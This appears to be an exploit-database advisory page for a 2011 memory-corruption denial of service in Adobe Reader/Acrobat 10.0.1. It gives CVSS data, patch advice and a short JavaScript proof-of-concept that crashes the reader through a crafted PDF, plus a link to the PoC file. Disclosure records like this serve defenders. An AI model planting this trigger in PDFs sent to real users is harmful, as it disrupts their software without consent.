Adobe Reader/Acrobat Memory Corruption Denial of Service

vendor:

Reader/Acrobat

by:

Soroush Dalili

7.8

CVSS

HIGH

Memory Corruption Denial of Service

119

CWE

Product Name: Reader/Acrobat

Affected Version From: 10.0.1

Affected Version To: 14 June 2011 Patch

Patch Exists: YES

Related CWE: CVE-2011-0609

CPE: a:adobe:reader

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 SP1, Windows XP SP3

2011

Adobe Reader/Acrobat Memory Corruption Denial of Service

A vulnerability in Adobe Reader/Acrobat could allow an attacker to cause a denial of service (DoS) condition. The vulnerability is due to a memory corruption issue when processing a specially crafted PDF file. An attacker could exploit this vulnerability by convincing a user to open a malicious PDF file. Successful exploitation could result in a DoS condition.

Mitigation:

Adobe has released a patch to address this vulnerability. Users should upgrade to the latest version of Adobe Reader/Acrobat.

Source

Exploit-DB raw data:

Title: [Adobe Reader/Acrobat Memory Corruption Denial of Service]
Report to Vendor: 24 Feb 2011
Application Name: [Adobe Reader/Acrobat]
Version: [10.0.1, other versions can be vulnerable before applying the 14 June 2011 Patch]
Reference(s): [
- http://secunia.com/advisories/43269/
]
Finder(s): [
- Soroush Dalili (Irsdl [at] yahoo [dot] com) - www.SecProject.com
]
PoC: Tested on Windows 7 SP1 and Windows XP SP3

PoC Details:
The following JS was the problem point inside the PDF file (Open the PoC file by a text editor):
/*****************************************************************************/
		var temp;
		for(var i=0;i<=8;i++)
		{
			temp+=temp+temp+"A";
		}
		var result = temp;
		try{
			viewState= result;
		}catch(e){}
		dirty; // Important!
/*****************************************************************************/

PoC: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17405.pdf